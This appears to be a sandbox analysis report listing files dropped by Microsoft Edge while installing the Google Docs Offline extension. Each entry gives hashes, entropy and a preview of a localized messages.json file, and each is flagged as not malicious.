                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1425
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):961
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):959
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):968
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                                MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                                SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                                SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                                SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):838
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                                MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                                SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                                SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                                SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1305
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                                MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                                SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                                SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                                SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):911
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                                MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                                SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                                SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                                SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):939
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                                MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                                SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                                SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                                SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):977
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                                SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):972
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                                SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):990
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                                MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                                SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                                SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                                SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1658
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                                MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                                SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                                SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                                SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1672
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                                MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                                SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                                SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                                SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):935
